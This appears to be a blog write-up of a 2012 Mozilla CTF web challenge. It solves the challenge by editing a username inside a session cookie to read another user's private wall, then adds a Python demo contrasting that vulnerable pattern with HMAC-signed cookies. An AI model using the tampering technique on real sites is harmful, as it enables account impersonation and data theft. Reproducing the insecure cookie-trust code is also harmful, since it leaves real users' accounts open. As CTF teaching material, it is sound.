Thursday, January 26, 2012

Mozilla CTF 2012 - Fishr - Fish your messages out of the sea (500)

Challenge 19 was the first that I began to work on.


19 - Fishr - Fish your messages out of the sea
Please log in to Fishr using the name 0wn and the password pwnthis.
The flag is on fl4gdud3's wall, get it.
gold: 500 +3 (1st), +2 (2nd), +1 (3rd)

This challenge was worth the most points of all the challenges, so I thought it would be a good starting point.


The gameplay was straightforward: the flag was on fl4gdud3's wall. I chose to use Burp Suite while I was looking around. Once logged in you can see that you have friends you can follow, like Twitter. As you click around you will see who "admin" is following and who is following admin, which happens to be "flagdud3". This was the first piece of the puzzle: now you know the real name you are looking for, not the dude with the 4 in his name.

Upon trying to browse to "flagdud3's" page you get an error:

Sorry, but there are no visible Posts. This user might have set his wall to private and you lack the permission to read private wall messages.

Now you know that you need to find a way to get to this wall as a different user. Let's turn to Burp and look at the request.


GET /ajax.php?p=wall&arg=flagdud3 HTTP/1.1
Host: challenge19.mozillactf.org
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Referer: https://challenge19.mozillactf.org/index.php
Cookie: data=7%3A0wn%3A0wn%2540spam.com; mac=eccc50cafdb69aac25dba7738651ddff
DNT: 1
Connection: keep-alive

The cookie is the key, and you can see that your username is in it:

7%3A0wn%3A0wn%2540spam.com;

So if you send this request to Repeater and alter the cookie to use "flagdud3", so that it looks like:

7%3Aflagdud3%3Aflagdud3%2540spam.com;

you will get the response that you are looking for:

  Kickin' in the front seat - sittin' in the back seat...
    <span class="time">- posted at 27.12.2011 16:32</span>
  </div>
  <div class="post">
    <b>flagdud3:</b>
    Flag: s0ci4lly4wkw4rd
    <span class="time">- posted at 26.12.2011 12:46</span>

And there you have it: 500 points.
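The bug behind this challenge is that the server decides who you are from a value the browser sends and can freely edit. The following added example (not code from the challenge or from the writeup) models that: it parses a `data` cookie in the same id:user:email shape shown above (URL-encoded twice, which is why "@" appears as "%2540"), shows the vulnerable pattern of trusting the name in the cookie directly, and beside it a hardened version that only accepts the cookie when a server-side HMAC over its exact bytes matches a tag cookie. The real site also sent a `mac` cookie; the writeup does not say what it covered, only that the edited `data` was accepted, so the hardened half here is an assumption about how it should have worked, not a description of the challenge. The secret key, the wall-privacy rule (owner only) and the cookie values are constructed for the demo.

```python
import hashlib
import hmac
from urllib.parse import unquote

# Constructed sample cookies in the shape the writeup shows (id:user:email,
# URL-encoded twice: "%2540" -> "%40" -> "@"). Not the real session values.
ORIGINAL_DATA = "7%3A0wn%3A0wn%2540spam.com"
TAMPERED_DATA = "7%3Aflagdud3%3Aflagdud3%2540spam.com"

# Assumed server-side secret for the hardened version (constructed, not the CTF's).
SERVER_SECRET = b"constructed-server-secret-not-the-ctf-value"


def parse_data_cookie(value):
    """Decode the `data` cookie into (user_id, username, email)."""
    decoded = unquote(unquote(value))          # undo the double URL-encoding
    user_id, username, email = decoded.split(":", 2)
    return int(user_id), username, email


def current_user_insecure(cookies):
    """Vulnerable pattern: whoever the cookie names is who the server believes you are."""
    _, username, _ = parse_data_cookie(cookies["data"])
    return username


def sign_data(data_value, key=SERVER_SECRET):
    """HMAC-SHA256 tag over the exact cookie bytes the client will send back."""
    return hmac.new(key, data_value.encode(), hashlib.sha256).hexdigest()


def current_user_secure(cookies, key=SERVER_SECRET):
    """Hardened pattern: the identity in `data` counts only if the `mac` tag verifies.

    Returns None (treat as anonymous) for a missing, unsigned or tampered cookie.
    """
    data_value = cookies.get("data", "")
    tag = cookies.get("mac", "")
    # compare_digest avoids leaking how many characters of the tag matched
    if not hmac.compare_digest(sign_data(data_value, key), tag):
        return None
    _, username, _ = parse_data_cookie(data_value)
    return username


def can_read_wall(viewer, owner, private_walls):
    """Assumed authorization rule: a private wall is readable only by its owner.

    The check itself is fine; the challenge failed because `viewer` was attacker-chosen.
    """
    if owner not in private_walls:
        return True
    return viewer == owner


def demo():
    """Run both versions against the original and the edited cookie."""
    private = {"flagdud3"}
    # Vulnerable server: the edited cookie simply makes you flagdud3.
    insecure_viewer = current_user_insecure({"data": TAMPERED_DATA})
    insecure_access = can_read_wall(insecure_viewer, "flagdud3", private)
    # Hardened server: the tag was minted for the original data, so the edit is rejected.
    mac = sign_data(ORIGINAL_DATA)
    secure_viewer = current_user_secure({"data": TAMPERED_DATA, "mac": mac})
    secure_access = can_read_wall(secure_viewer, "flagdud3", private)
    return insecure_viewer, insecure_access, secure_viewer, secure_access


if __name__ == "__main__":
    print(demo())   # ('flagdud3', True, None, False)
```

The point of the contrast is that the wall-privacy check was probably correct on its own; what failed was the identity it was fed. Any scheme that lets the browser carry the identity must bind it to something the client cannot forge, here an HMAC with a key that never leaves the server, and the verification has to cover the exact bytes that are parsed afterwards.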
